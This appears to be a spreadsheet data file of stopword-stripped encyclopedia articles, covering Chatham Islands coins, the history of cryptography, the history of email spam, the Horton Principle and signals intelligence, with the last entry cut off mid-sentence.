level. inscription, 'chatham islands' king's portrait. dates '1760–1820' inscribed chin. date '2001' appears truncation. inscription, 'fifty dollar millennium silver piece' goes behind king's portrait around front level. reverse: design compass pointing north, ship, 18th-century royal navy officer's number '50' superimposed hat. outer inscriptions 'lieut broughton. brig chatham 1791'. inner inscription 'discovery chatham islands long'. inscription 'fifty dollar piece' appears '50'. coin dual commemorative: millennium 210th anniversary british discovery chatham islands.both coins milled edges.the reserve bank zealand banned issue coin 2001. there pieces coin known exist. additional information notes verified chatham islands note corporation limited references external links chatham islands "dollars" legal 'negotiable' tender chatham islands dollars photos list notes, higher-resolution photos chatham islands dollar extract zealand registrar companies website</t>
  </si>
  <si>
    <t>History of cryptography</t>
  </si>
  <si>
    <t>cryptography, codes ciphers protect secrets, began thousands years ago. until recent decades, story might called classical cryptography methods encryption paper, perhaps simple mechanical aids. early 20th century, invention complex mechanical electromechanical machines, enigma rotor machine, provided sophisticated efficient means encryption; subsequent introduction electronics computing allowed elaborate schemes still greater complexity, entirely unsuited paper. development cryptography paralleled development cryptanalysis "breaking" codes ciphers. discovery application, early frequency analysis reading encrypted communications has, occasion, altered course history. thus zimmermann telegram triggered united states' entry world allies reading nazi germany's ciphers shortened world evaluations much years. until 1960s, secure cryptography largely preserve governments. events since brought squarely public domain: creation public encryption standard (des), invention public-key cryptography. antiquity earliest known cryptography found non-standard hieroglyphs carved wall tomb kingdom egypt circa 1900 these thought serious attempts secret communications, however, rather attempts mystery, intrigue, even amusement literate onlookers.some clay tablets mesopotamia somewhat later clearly meant protect information—one dated near 1500 found encrypt craftsman's recipe pottery glaze, presumably commercially valuable. furthermore, hebrew scholars made simple monoalphabetic substitution ciphers (such atbash cipher) beginning perhaps around bc.in india around mlecchita vikalpa "the understanding writing cypher, writing words peculiar way" documented kama sutra purpose communication lovers. this also likely simple substitution cipher. parts egyptian demotic greek magical papyri written cypher script.the ancient greeks said known ciphers. scytale transposition cipher used spartan military, definitively known whether scytale encryption, authentication, avoiding omens speech. herodotus tells secret messages physically concealed beneath wooden tablets tattoo slave's head concealed regrown hair, although properly examples cryptography message, known, directly readable; known steganography. another greek method developed polybius (now called "polybius square"). romans knew something cryptography (e.g., caesar cipher variations). medieval cryptography david kahn notes codebreakers modern cryptology originated among arabs, first people systematically document cryptanalytic methods. al-khalil (717–786) wrote book cryptographic messages, contains first permutations combinations list possible arabic words without vowels.the invention frequency analysis technique breaking monoalphabetic substitution ciphers, al-kindi, arab mathematician, sometime around 800, proved single significant cryptanalytic advance world al-kindi wrote book cryptography entitled risalah istikhraj al-mu'amma (manuscript deciphering cryptographic messages), described first cryptanalytic techniques, including polyalphabetic ciphers, cipher classification, arabic phonetics syntax, importantly, gave first descriptions frequency analysis. also covered methods encipherments, cryptanalysis certain encipherments, statistical analysis letters letter combinations arabic. important contribution adlan (1187–1268) sample size frequency analysis.in early medieval england years 800–1100, substitution ciphers frequently used scribes playful clever encipher notes, solutions riddles, colophons. ciphers tend fairly straightforward, sometimes deviate ordinary pattern, adding complexity, possibly also sophistication. this period vital significant cryptographic experimentation west. ahmad al-qalqashandi 1355–1418) wrote subh al-a 'sha, 14-volume encyclopedia included section cryptology. this information attributed al-durayhim lived 1312 1361, whose writings cryptography lost. list ciphers work included substitution transposition, first time, cipher multiple substitutions plaintext letter (later called homophonic substitution). also traced al-durayhim exposition worked example cryptanalysis, including tables letter frequencies sets letters cannot occur together word. earliest example homophonic substitution cipher used duke mantua early 1400s. homophonic cipher replaces letter multiple symbols depending letter frequency. cipher ahead time combines monoalphabetic polyalphabetic features. essentially ciphers remained vulnerable cryptanalytic technique frequency analysis development polyalphabetic cipher, many remained thereafter. polyalphabetic cipher clearly explained leon battista alberti around 1467, called "father western cryptology". johannes trithemius, work poligraphia, invented tabula recta, critical component vigenère cipher. trithemius also wrote steganographia. french cryptographer blaise vigenère devised practical polyalphabetic system bears name, vigenère cipher.in europe, cryptography became (secretly) important consequence political competition religious revolution. instance, europe renaissance, citizens various italian states—the papal states roman catholic church included—were responsible rapid proliferation cryptographic techniques, reflect understanding even knowledge) alberti's polyalphabetic advance. "advanced ciphers", even alberti, advanced inventors developers users claimed (and probably even believed). they frequently broken. this over-optimism inherent cryptography, remains today difficult principle know vulnerable one's system absence knowledge, guesses hopes predictably common. cryptography, cryptanalysis, secret-agent/courier betrayal featured babington plot reign queen elizabeth execution mary, queen scots. robert hooke suggested chapter dee's book spirits, john made trithemian steganography, conceal communication queen elizabeth i.the chief cryptographer king louis france antoine rossignol; family created known great cipher remained unsolved initial 1890, french military cryptanalyst, étienne bazeries solved encrypted message time iron mask (decrypted prior 1900 étienne bazeries) shed some, regrettably non-definitive, light identity real, legendary unfortunate, prisoner. outside europe, mongols brought islamic golden age, cryptography remained comparatively undeveloped. cryptography japan seems used 1510, advanced techniques known opening country west beginning 1860s. cryptography 1800 world although cryptography long complex history, 19th century developed anything approaches either encryption cryptanalysis (the science finding weaknesses crypto systems). examples latter include charles babbage's crimean work mathematical cryptanalysis polyalphabetic ciphers, redeveloped published somewhat later prussian friedrich kasiski. understanding cryptography time typically consisted hard-won rules thumb; see, example, auguste kerckhoffs' cryptographic writings latter 19th century. edgar allan used systematic methods solve ciphers 1840s. particular placed notice abilities philadelphia paper alexander's weekly (express) messenger, inviting submissions ciphers, proceeded solve. success created public stir months. later wrote essay methods cryptography proved useful introduction novice british cryptanalysts attempting break german codes ciphers world famous story, gold-bug, cryptanalysis prominent element. cryptography, misuse, involved execution mata hari dreyfus' conviction imprisonment, early 20th century. cryptographers also involved exposing machinations dreyfus affair; mata hari, contrast, shot. world admiralty's room broke german naval codes played important role several naval engagements war, notably detecting major german sorties north battles dogger bank jutland british fleet sent intercept them. however, important contribution probably decrypting zimmermann telegram, cable german foreign office sent washington ambassador heinrich eckardt mexico played major part bringing united states war. 1917, gilbert vernam proposed teleprinter cipher previously prepared key, kept paper tape, combined character character plaintext message produce cyphertext. this development electromechanical devices cipher machines, unbreakable cipher, time pad. during 1920s, polish naval-officers assisted japanese military code cipher development. mathematical methods proliferated period prior world (notably william friedman's application statistical techniques cryptanalysis cipher development marian rejewski's initial break german army's version enigma system 1932). world cryptography world mechanical electromechanical cipher machines wide use, although—where machines impractical—code books manual systems continued use. great advances made cipher design cryptanalysis, secrecy. information period begun declassified official british 50-year secrecy period come end, archives slowly opened, assorted memoirs articles appeared. germany germans made heavy use, several variants, electromechanical rotor machine known enigma. mathematician marian rejewski, poland's cipher bureau, december 1932 deduced detailed structure german army enigma, using mathematics limited documentation supplied captain gustave bertrand french military intelligence acquired german clerk. this greatest breakthrough cryptanalysis thousand years more, according historian david kahn. rejewski mathematical cipher bureau colleagues, jerzy różycki henryk zygalski, continued reading enigma keeping pace evolution german army machine's components encipherment procedures time. poles' resources became strained changes introduced germans, loomed, cipher bureau, polish general staff's instructions, july 1939, warsaw, initiated french british intelligence representatives secrets enigma decryption. soon invasion poland germany september 1939, cipher bureau personnel evacuated southeastward; september, soviet union attacked poland east, crossed romania. from reached paris, france; bruno, near paris, continued working toward breaking enigma, collaborating british cryptologists bletchley park british speed work breaking enigma. course, british cryptographers whose ranks included many chess masters mathematics dons gordon welchman, newman, alan turing (the conceptual founder modern computing) made substantial breakthroughs scale technology enigma decryption. german code breaking world also success, importantly breaking naval cipher this enabled track sink atlantic convoys. ultra intelligence finally persuaded admiralty change codes june 1943. this surprising given success british room code breakers previous world war. war, april 1945, britain's highest level civilian military officials told could never reveal german enigma cipher broken would give defeated enemy chance "were well fairly beaten".the german military also deployed several teleprinter stream ciphers. bletchley park called fish ciphers; newman colleagues designed deployed heath robinson, world's first programmable digital electronic computer, colossus, help cryptanalysis. german foreign office began one-time 1919; traffic read world partly result recovery material south america discarded without sufficient care german courier. schlüsselgerät developed late secure replacement enigma, limited use. japan army group, sis, managed break highest security japanese diplomatic cipher system electromechanical stepping switch machine called purple americans) 1940, attack pearl harbour. locally developed purple machine replaced earlier "red" machine used japanese foreign ministry, related machine, m-1, used naval attachés broken u.s. navy's agnes driscoll. japanese machine ciphers broken, degree another, allies. japanese navy army largely used code book systems, later separate numerical additive. navy cryptographers (with cooperation british dutch cryptographers 1940) broke several japanese navy crypto systems. break them, jn-25, famously victory battle midway; publication fact chicago tribune shortly battle, though japanese seem noticed kept using jn-25 system. allies americans referred intelligence resulting cryptanalysis, perhaps especially purple machine, 'magic'. british eventually settled 'ultra' intelligence resulting cryptanalysis, particularly message traffic protected various enigmas. earlier british term ultra 'boniface' attempt suggest, betrayed, might individual agent source. allied cipher machines used world included british typex american sigaba; electromechanical rotor designs similar spirit enigma, albeit major improvements. neither known broken anyone war. poles used lacida machine, security found less intended polish army cryptographers uk), discontinued. troops field used m-209 still less secure m-94 family machines. british agents initially used 'poem ciphers' (memorized poems encryption/decryption keys), later war, began switch one-time pads. cipher (used least 1957 connection rudolf abel's ring) complex hand cipher, claimed complicated known used soviets, according david kahn kahn codes. decrypting soviet ciphers (particularly one-time pads reused), venona project. role women employed large numbers women code-breaking operation, close 7,000 reporting bletchley park 11,000 separate army navy operations, around washington, tradition japan nazi doctrine germany, women excluded work, least late war. even encryption systems broken, large amounts work needed respond changes made, recover daily settings multiple networks, intercept, process, translate, prioritize analyze huge volume enemy messages generated global conflict. women, including elizabeth friedman agnes meyer driscoll, major contributors code-breaking 1930s navy army began actively recruiting graduates women's colleges shortly attack pearl harbor. liza mundy argues disparity utilizing talents women allies axis made strategic difference war.: p.29 modern cryptography encryption modern times achieved using algorithms encrypt decrypt information. these keys convert messages data "digital gibberish" encryption return original form decryption. general, longer difficult crack code. this holds true deciphering encrypted message brute force would require attacker every possible key. context, binary unit information, bit, value 8-bit would possible keys. 56-bit would 2^56, quadrillion, possible keys decipher message. with modern technology, cyphers using keys lengths becoming easier decipher. des, early government approved cypher, effective length bits, test messages using cypher broken brute force search. however, technology advances, quality encryption. since world notable advances study cryptography introduction asymmetric cyphers (sometimes termed public-key cyphers). these algorithms mathematically related keys encryption message. some algorithms permit publication keys, extremely difficult determine simply knowledge other.beginning around 1990, internet commercial purposes introduction commercial transactions internet called widespread standard encryption. before introduction advanced encryption standard (aes), information sent internet, financial data, encrypted all, commonly using data encryption standard (des). this approved government agency) security, public call for, competition among, candidates cypher algorithm. approved short period, extended complex wrangles public high quality encryption. finally replaced another public competition organized successor agency, nist. around late 1990s early 2000s, public-key algorithms became common approach encryption, soon hybrid schemes became accepted e-commerce operations proceed. additionally, creation protocol known secure socket layer, ssl, online transactions take place. transactions ranging purchasing goods online bill banking used ssl. furthermore, wireless internet connections became common among households, need encryption grew, level security needed everyday situations. claude shannon claude shannon considered many father mathematical cryptography. shannon worked several years bell labs, time there, produced article entitled mathematical theory cryptography". this article written 1945 eventually published bell system technical journal 1949. commonly accepted paper starting point development modern cryptography. shannon inspired address "[t]he problems cryptography [because] secrecy systems furnish interesting application communication theory". shannon identified main goals cryptography: secrecy authenticity. focus exploring secrecy thirty-five years later, g.j. simmons would address issue authenticity. shannon wrote article entitled mathematical theory communication" highlights significant aspects work: cryptography's transition science.in works, shannon described basic types systems secrecy. first designed intent protect hackers attackers infinite resources decode message (theoretical secrecy, unconditional security), second designed protect hackers attacks finite resources decode message (practical secrecy, computational security). most shannon's work focused around theoretical secrecy; here, shannon introduced definition "unbreakability" cipher. cipher determined "unbreakable", considered "perfect secrecy". proving "perfect secrecy", shannon determined could obtained secret whose length given binary digits greater equal number bits contained information encrypted. furthermore, shannon developed "unicity distance", defined "amount plaintext that… determines secret key."shannon's work influenced cryptography research 1970s, public-key cryptography developers, hellman diffie cited shannon's research major influence. work also impacted modern designs secret-key ciphers. shannon's work cryptography, progress slowed hellman diffie introduced paper involving "public-key cryptography". encryption standard mid-1970s major public (i.e., non-secret) advances. first publication draft data encryption standard u.s. federal register march 1975. proposed cipher submitted research group ibm, invitation national bureau standards (now nist), effort develop secure electronic communication facilities businesses banks large financial organizations. after advice modification nsa, acting behind scenes, adopted published federal information processing standard publication 1977 (currently fips 46-3). first publicly accessible cipher 'blessed' national agency nsa. release specification stimulated explosion public academic interest cryptography. aging officially replaced advanced encryption standard (aes) 2001 nist announced fips 197. after open competition, nist selected rijndael, submitted belgian cryptographers, aes. des, secure variants (such triple des), still used today, incorporated many national organizational standards. however, 56-bit key-size shown insufficient guard brute force attacks (one attack, undertaken cyber civil-rights group electronic frontier foundation 1997, succeeded hours.) result, straight encryption without doubt insecure cryptosystem designs, messages protected older cryptosystems using des, indeed messages sent since 1976 using des, also risk. regardless des' inherent quality, size (56-bits) thought small even 1976, perhaps publicly whitfield diffie. there suspicion government organizations even sufficient computing power break messages; clearly others achieved capability. public second development, 1976, perhaps even important, fundamentally changed cryptosystems might work. this publication paper directions cryptography whitfield diffie martin hellman. introduced radically method distributing cryptographic keys, went toward solving fundamental problems cryptography, distribution, become known diffie–hellman exchange. article also stimulated almost immediate public development class enciphering algorithms, asymmetric algorithms. prior time, useful modern encryption algorithms symmetric algorithms, cryptographic used underlying algorithm sender recipient, must keep secret. electromechanical machines used world logical class, caesar atbash ciphers essentially cipher systems throughout history. 'key' code course, codebook, must likewise distributed kept secret, shares problems practice. necessity, every system exchanged communicating parties secure prior system (the term usually used 'via secure channel') trustworthy courier briefcase handcuffed wrist, face-to-face contact, loyal carrier pigeon. this requirement never trivial rapidly becomes unmanageable number participants increases, secure channels available exchange, when, sensible cryptographic practice, keys frequently changed. particular, messages meant secure users, separate required possible pair users. system kind known secret key, symmetric cryptosystem. exchange (and succeeding improvements variants) made operation systems much easier, secure, ever possible history. contrast, asymmetric encryption uses pair mathematically related keys, decrypts encryption performed using other. some, all, algorithms additional property paired keys cannot deduced known method trial error. algorithm kind known public asymmetric system. using algorithm, pair needed user. designating pair private (always secret), public (often widely available), secure channel needed exchange. long private stays secret, public widely known long time without compromising security, making safe reuse pair indefinitely. users asymmetric algorithm communicate securely insecure channel, user need know public private keys well user's public key. take basic scenario: alice pair keys they've using years many users. start message, exchange public keys, unencrypted insecure line. alice encrypts message using private key, re-encrypts result using bob's public key. double-encrypted message sent digital data wire alice bob. receives stream decrypts using private key, decrypts stream using alice's public key. final result recognizable message, confident message actually came someone knows alice's private (presumably actually careful private key), anyone eavesdropping channel need bob's private order understand message. asymmetric algorithms rely effectiveness class problems mathematics called one-way functions, require relatively little computational power execute, vast amounts power reverse, reversal possible all. classic example one-way function multiplication large prime numbers. it's fairly quick multiply large primes, difficult find factors product large primes. because mathematics one-way functions, possible keys choices cryptographic keys; small fraction possible keys given length suitable, asymmetric algorithms require long keys reach level security provided relatively shorter symmetric keys. need generate pairs, perform encryption/decryption operations make asymmetric algorithms computationally expensive, compared symmetric algorithms. since symmetric algorithms often sequence (random, least unpredictable) bits key, disposable session quickly generated short-term use. consequently, common practice long asymmetric exchange disposable, much shorter (but strong) symmetric key. slower asymmetric algorithm securely sends symmetric session key, faster symmetric algorithm takes remainder message. asymmetric cryptography, diffie–hellman exchange, best known public private algorithms (i.e., usually called algorithm), seem independently developed intelligence agency public announcement diffie hellman 1976. gchq released documents claiming developed public cryptography publication diffie hellman's paper. various classified papers written gchq 1960s 1970s eventually schemes essentially identical encryption diffie–hellman exchange 1973 1974. some published, inventors (james ellis, clifford cocks, malcolm williamson) made public (some work. hashing hashing common technique used cryptography encode information quickly using typical algorithms. generally, algorithm applied string text, resulting string becomes "hash value". this creates "digital fingerprint" message, specific hash value used identify specific message. output algorithm also referred "message digest" "check sum". hashing good determining information changed transmission. hash value different upon reception upon sending, evidence message altered. once algorithm applied data hashed, hash function produces fixed-length output. essentially, anything passed hash function resolve length output anything else passed hash function. important note hashing encrypting. hashing one-way operation used transform data compressed message digest. additionally, integrity message measured hashing. conversely, encryption two-way operation used transform plaintext cipher-text vice versa. encryption, confidentiality message guaranteed.hash functions used verify digital signatures, signing documents internet, signature applied particular individual. much like hand-written signature, signatures verified assigning exact hash code person. furthermore, hashing applied passwords computer systems. hashing passwords began unix operating system. user system would first create password. that password would hashed, using algorithm key, stored password file. this still prominent today, applications require passwords often hash user's passwords store database. cryptography politics public developments 1970s broke near monopoly high quality cryptography held government organizations (see levy's crypto journalistic account policy controversy time us). first time ever, outside government organizations access cryptography readily breakable anyone (including governments). considerable controversy, conflict, public private, began less immediately, sometimes called crypto wars. they subsided. many countries, example, export cryptography subject restrictions. until 1996 export u.s. cryptography using keys longer bits (too small secure knowledgeable attacker) sharply limited. recently 2004, former director louis freeh, testifying 9/11 commission, called laws public encryption. significant people favoring strong encryption public phil zimmermann. wrote 1991 released (pretty good privacy), high quality crypto system. distributed freeware version felt threatened legislation consideration government would require backdoors included cryptographic products developed within system released worldwide shortly released began long criminal investigation government justice department alleged violation export restrictions. justice department eventually dropped case zimmermann, freeware distribution continued around world. even eventually became open internet standard (rfc 2440 openpgp). modern cryptanalysis while modern ciphers like higher quality asymmetric ciphers widely considered unbreakable, poor designs implementations still sometimes adopted important cryptanalytic breaks deployed crypto systems recent years. notable examples broken crypto designs include first wi-fi encryption scheme wep, content scrambling system used encrypting controlling use, a5/1 a5/2 ciphers used cell phones, crypto1 cipher used widely deployed mifare classic smart cards semiconductors, spun division philips electronics. symmetric ciphers. thus far, mathematical ideas underlying public cryptography proven 'unbreakable', future mathematical analysis advance might render systems relying insecure. while informed observers foresee breakthrough, size recommended security best practice keeps increasing increased computing power required breaking codes becomes cheaper available. quantum computers, ever constructed enough capacity, could break existing public algorithms efforts underway develop standardize post-quantum cryptography. even without breaking encryption traditional sense, side-channel attacks mounted exploit information gained computer system implemented, cache memory usage, timing information, power consumption, electromagnetic leaks even sounds emitted. newer cryptographic algorithms developed make attacks difficult. also encryption systems steganography timeline cryptography topics cryptography japanese cryptology 1500s meiji world cryptography world cryptography list cryptographers category:undeciphered historical codes ciphers references external links helger lipmaa's cryptography pointers timeline cipher machines</t>
  </si>
  <si>
    <t>History of email spam</t>
  </si>
  <si>
    <t>history email spam reaches back mid-1990s commercial internet first became possible marketers publicists began test possible. very soon email spam ubiquitous, unavoidable repetitive. this article details significant events history spam, efforts made limit background commercialization internet integration electronic mail accessible means communication another face influx unwanted information mails. internet started gain popularity early 1990s, quickly recognized excellent advertising tool. practically cost, person internet send email message thousands people. these unsolicited junk electronic mails came called 'spam'. history spam intertwined history electronic mail. while linguistic significance usage word 'spam' attributed british comedy troupe monty python legendary sketch flying circus series, group vikings sing chorus "spam, spam, spam..." increasing volumes, historic significance lies adopted refer unsolicited commercial electronic mail sent large number addresses, seen drowning normal communication internet. "first spam email" 1978 first known spam electronic mail (although called email), sent 1978 several hundred users arpanet. advertisement presentation digital equipment corporation decsystem-20 products sent gary thuerk, marketer theirs.the reaction almost universally negative, long time instances. usenet name "spam" actually first applied, april 1993, email, unwanted postings usenet newsgroup network. richard depew accidentally posted messages news.admin.policy aftermath readers group making jokes accident, person referred messages “spam”, coining term would later applied similar incidents email. january 1994, first large-scale deliberate usenet spam occurred. message subject “global alert all: jesus coming soon” cross-posted every available newsgroup. controversial message sparked many debates across usenet. april 1994 first commercial usenet spam arrived. lawyers phoenix, canter siegel, hired programmer post "green card lottery- final one?" message many newsgroups possible. what made different hide fact spammers. they proud thought great advertising. they even went write book "how make fortune information superhighway everyone’s guerrilla guide marketing internet other on-line services". they planned opening consulting company help people post similar advertisements, never took off. 1990s maps ("mail abuse prevention system") founded 1996. dave rand paul vixie, well known internet software engineers, started keeping list addresses sent spam engaged behavior found objectionable. list became known real-time blackhole list (rbl). many network managers wanted block unwanted email. thus, rand vixie created dns-based distribution scheme quickly became popular.spam already becoming serious concern, leading late 1997 maps, "blackhole list" allow mail servers block mail coming spam sources. others started dns-based blacklists open relays. alan hodgson started dorkslayers september 1998. november 1998 forced close, since upstream bctel considered open relay scanning abusive. successor orbs project moved alan brown zealand.al iverson radparker started rrss around 1999. september 1999 project folded maps group dns-based lists rss. august 1999, maps listed orbs mail servers, since orbs relay testing thought abusive. 2000, spam becomes serious problem spamassassin spam-filtering system first uploaded sourceforge.net april 2001 creator justin mason. 2000 iloveyou computer worm travelled email tens millions windows personal computers. although spam, impact highlighted pervasive email become. june 2001, orbs sued zealand, shortly thereafter closed (see open relay behavior-modification system#lawsuits details). august 2002, paul graham published influential paper, plan spam", describing spam-filtering technique using improved bayesian filtering variants soon implemented number products. including server-side email filters, dspam, spamassassin, spambayes. 2003, fight control spam june 2003 meng weng wong started spf-discuss mailing list posted first version "sender permitted from" proposal, would later become sender policy framework, simple email-validation system designed detect email spoofing part solution spam. can-spam 2003 signed president george bush december 2003, establishing united states' first national standards sending commercial email requiring federal trade commission (ftc) enforce provisions. backronym can-spam derives bill's full name: "controlling assault non-solicited pornography marketing 2003". plays word "canning" (putting spam, usual term unsolicited email type; well reference canned spam food product. bill sponsored congress senators conrad burns wyden. january 2004 bill gates microsoft announced "spam soon thing past."in 2004, howard carmack buffalo, york sentenced years sending million messages, using stolen identities. 2003 also lost million civil lawsuit earthlink.on september 2004, nicholas tombros pleaded guilty charges became first spammer convicted can-spam 2003. sentenced july 2007 three years' probation, months' house arrest, fined $10,000.on november 2004, jeremy jaynes, rated 8th-most prolific spammer world, according spamhaus, convicted three felony charges using servers virginia send thousands fraudulent emails. court recommended sentence nine years' imprisonment, imposed april 2005 although start sentence deferred pending appeals. jaynes claimed income $750,000 month spamming activities. february 2008 supreme court virginia overturned conviction.on november 2004, nick marinellis sydney, australia, sentenced years sending nigerian emails.on december 2004, british authorities arrested christopher pierson lincolnshire, charged malicious communication causing public nuisance. january 2005, pleaded guilty sending hoax emails relatives people missing following asian tsunami disaster. 2005 july 2005, russian spammer vardan kushnir, believed spammed every single russian internet user, found dead moscow apartment, suffered numerous blunt-force blows head. believed kushnir's murder unrelated spamming activities.on november 2005, david levi, lytham, england sentenced four years conspiracy defraud sending emails pretending ebay. brother levi, sentenced months pleading guilty conspiracy defraud, four others sentenced months money laundering.on november 2005, peter francis-macrae cambridgeshire, described britain's prolific spammer, sentenced years prison. 2006 january 2006, james mccalla ordered $11.2 billion iowa, u.s. barred using internet years sending million email messages. court, represented attorney.on june 2006, ironport released study found spam emails originating zombie computers. report also found billion daily spam emails june 2006, large increase billion daily spam emails june 2005. study used senderdata represents global email traffic data 100,000 isp's, universities, corporations. august 2006, announced intention digging garden parents spammer davis wolfgang hawke search buried gold platinum. awarded us$12.8 million judgment 2005 hawke, gone hiding. permission search granted judge proved spammer bought large amounts gold platinum. july, 2007, decided proceed.on october 2006, brian michael mcmullen, east pittsburgh, pennsylvania, u.s., sentenced three years' supervised release, five months' home detention ordered restitution amount $11,848.55 violating can-spam 2003.on october 2006, federal court australia fined clarity1 a$4.5 million (us$3.4 million; euro2.7 million) director wayne mansfield million (us$760,000; euro600,000) sending unsolicited emails first conviction australia's spam 2003.in november 2006, christopher william smith (aka chris "rizler" smith) convicted counts offenses related smith's spamming. 2007 january 2007, azusa, california convicted jury united states district court central district california angeles united states goodin, u.s. district court, central district california, 06-110, can-spam 2003 (the first conviction act). sentenced began serving 70-month sentence june 2007.on 2007, notorious spammer robert soloway arrested indicted federal grand jury charges including mail fraud, wire fraud, email fraud, identity theft, money laundering. convicted, could face decades behind bars. bail initially denied although released half house september. march 2008, robert soloway reached agreement federal prosecutors, weeks scheduled trial charges. soloway pleaded guilty three charges felony mail fraud, fraud connection email, failing file 2005 return. exchange, federal prosecutors dropped charges. soloway faced years prison serious charge, $625,000 total fines. july 2008 robert soloway sentenced four years federal prison.on june 2007, convicted eight counts including conspiracy, fraud, money laundering, transportation obscene materials u.s. district court phoenix, arizona. prosecution first kind can-spam 2003, according release department justice. count falsifying headers, using domain names registered false information. sending millions hard-core pornography spam emails. sentenced five years prison ordered forfeit us$1.3 million. 2008 july 2008, eddie davidson "the spam king" walked away federal prison camp florence, colorado. subsequently found dead arapahoe county, colorado, reportedly killing wife three-year-old daughter, apparent murder-suicide.august survey marshal limited's website email internet content security company) showed 29.1% respondents bought something spam email. other studies, forrester research 2004, surveyed 6,000 active users, reported percent bought something spam, 2005 study mirapoint radicati group showed 11%, indicated clicking link spam caused receive spam before.&lt; 2007 study endai worldwide email marketing company) showed bought something spam. response marshal study, download squad started study. with respondents, 2.1% indicated ever bought something spam email.november mccolo, jose, california-based hosting provider identified hosting spamming organizations, internet providers. estimated mccolo hosted machines responsible percent spam sent worldwide. mccolo's upstream service severed tuesday, november afternoon, organizations tracking spam noted sharp decrease volume sent; much half. also laura betterly, first bulk commercial emailers history email history email marketing history gmail references further reading templeton, brad (2008). "reflections 25th anniversary spam". brad templeton's home page. coverage history spam. templeton, brad. "reaction spam 1978". brad templeton's home page. about first mass-mailed email spam.</t>
  </si>
  <si>
    <t>Horton Principle</t>
  </si>
  <si>
    <t>horton principle design rule cryptographic systems expressed "authenticate meant, said" "mean sign sign mean" merely encrypted version meant. principle named title character seuss children's book horton hatches egg.the horton principle becomes important using message authentication codes macs) cryptographic system. suppose alice wants send message bob, uses authenticate message made concatenating three data fields, needs know rules alice used create message order split back components, uses wrong rules he'll wrong values authenticated message. when applied case, horton principle works authenticating meaning instead message. instance, clears communication also information used parsing message meaning. meaning, however, also depends decryption used authentication must applied plaintext instead ciphertext.the problem authenticating string bytes, alice need authenticate message constructed well. not, possible attacker substitute message valid different meaning. systems manage problem adding metadata protocol number formatting messages explicit structure, xml. references</t>
  </si>
  <si>
    <t>Signals intelligence</t>
  </si>
  <si>
    <t>signals intelligence (sigint) intelligence-gathering interception signals, whether communications people (communications intelligence—abbreviated comint) electronic signals directly used communication (electronic intelligence—abbreviated elint). signals intelligence subset intelligence collection management. classified sensitive information usually encrypted, signals intelligence turn involves cryptanalysis decipher messages. traffic analysis—the study signaling quantity—is also used integrate information again. history origins electronic interceptions appeared early 1900, boer 1899–1902. british royal navy installed wireless sets produced marconi board ships late 1890s british army used limited wireless signalling. boers captured wireless sets used make vital transmissions. since british people transmitting time, special interpretation signals intercepted british necessary.the birth signals intelligence modern sense dates russo-japanese 1904–1905. russian fleet prepared conflict japan 1904, british ship diana stationed suez canal intercepted russian naval wireless signals sent mobilization fleet, first time history. development world over course first world war, method signals intelligence reached maturity. failure properly protect communications fatally compromised russian army advance early world disastrous defeat germans ludendorff hindenburg battle tannenberg. 1918, french intercept personnel captured message written adfgvx cipher, cryptanalyzed georges painvin. this gave allies advance warning german 1918 spring offensive. british particular built great expertise newly emerging field signals intelligence codebreaking (synonymous cryptanalysis). declaration war, britain german undersea cables. this forced germans either telegraph line connected british network could tapped, radio british could intercept. rear-admiral henry oliver appointed alfred ewing establish interception decryption service admiralty; room interception service known service, together post office marconi stations grew rapidly point british could intercept almost official german messages.the german fleet habit wirelessing exact position ship giving regular position reports sea. possible build precise picture normal operation high seas fleet, infer routes chose defensive minefields placed safe ships operate. whenever change normal pattern seen, immediately signalled operation take place warning could given. detailed information submarine movements also available.the radio receiving equipment pinpoint location transmitter also developed war. captain h.j. round working marconi, began carrying experiments direction finding radio equipment army france 1915. 1915, admiralty able track german submarines crossing north sea. some stations also acted stations collect german messages, section created within room plot positions ships directional reports.room played important role several naval engagements war, notably detecting major german sorties north sea. battle dogger bank small part intercepts allowed navy position ships right place. played vital role subsequent naval clashes, including battle jutland british fleet sent intercept them. direction-finding capability allowed tracking location german ships, submarines zeppelins. system successful, million words, comprising totality german wireless transmission course intercepted operators y-stations decrypted. however astonishing success decrypting zimmermann telegram, telegram german foreign office sent washington ambassador heinrich eckardt mexico. postwar consolidation with importance interception decryption firmly established wartime experience, countries established permanent agencies dedicated task interwar period. 1919, british cabinet's secret service committee, chaired lord curzon, recommended peace-time codebreaking agency created. government code cypher school (gc&amp;cs) first peace-time codebreaking agency, public function advise security codes cyphers used government departments assist provision", also secret directive "study methods cypher communications used foreign powers". gc&amp;cs officially formed november 1919, produced first decrypt october. 1940, gc&amp;cs working diplomatic codes ciphers countries, tackling diplomatic cryptosystems.the cipher bureau established 1919 achieved success washington naval conference 1921, cryptanalysis herbert yardley. secretary henry stimson closed cipher bureau 1929 words "gentlemen read other's mail." world sigint even greater implications world combined effort intercepts cryptanalysis whole british forces world came code name "ultra" managed government code cypher school bletchley park. properly used, german enigma lorenz ciphers virtually unbreakable, flaws german cryptographic procedures, poor discipline among personnel carrying out, created vulnerabilities made bletchley's attacks feasible. bletchley's work essential defeating u-boats battle atlantic, british naval victories battle cape matapan battle north cape. 1941, ultra exerted powerful effect north african desert campaign german forces general erwin rommel. general claude auchinleck wrote ultra, "rommel would certainly cairo". "ultra" decrypts featured prominently story operation salam, lászló almásy's mission across desert behind allied lines 1942. prior normandy landings d-day june 1944, allies knew locations germany's fifty-eight western-front divisions. winston churchill reported told king george thanks secret weapon general menzies, fronts, war!" supreme allied commander, dwight eisenhower, war, described ultra "decisive" allied victory. official historian british intelligence world harry hinsley, argued ultra shortened less years probably four years"; that, absence ultra, uncertain would ended. technical definitions united states department defense defined term "signals intelligence" category intelligence comprising either individually combination communications intelligence (comint), electronic intelligence (elint), foreign instrumentation signals intelligence (fisint), however transmitted. intelligence derived communications, electronic, foreign instrumentation signals.being broad field, sigint many sub-disciplines. main ones communications intelligence (comint) electronic intelligence (elint). disciplines shared across branches targeting collection system know look particular signal. "system", context, several nuances. targeting process developing collection requirements: intelligence need considered allocation intelligence resources. within department defense, collection requirements fulfill essential elements information intelligence needs commander, agency. established intelligence need, validated appropriate allocation intelligence resources requirement) fulfill essential elements information intelligence needs intelligence consumer." need multiple, coordinated receivers first, atmospheric conditions, sunspots, target's transmission schedule antenna characteristics, factors create uncertainty given signal intercept sensor able "hear" signal interest, even geographically fixed target opponent making attempt evade interception. basic countermeasures interception include frequent changing radio frequency, polarization, transmission characteristics. intercept aircraft could ground carry antennas receivers every possible frequency signal type deal countermeasures. second, locating transmitter's position usually part sigint. triangulation sophisticated radio location techniques, time arrival methods, require multiple receiving points different locations. these receivers send location-relevant 